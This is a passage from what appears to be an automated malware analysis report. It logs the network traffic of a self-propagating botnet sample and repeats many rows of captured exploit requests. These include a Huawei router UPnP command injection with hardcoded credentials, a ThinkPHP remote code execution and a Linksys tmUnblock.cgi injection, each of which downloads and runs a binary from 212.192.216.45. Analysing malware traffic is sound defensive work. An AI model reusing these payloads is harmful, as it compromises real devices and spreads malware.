6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept:Data Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 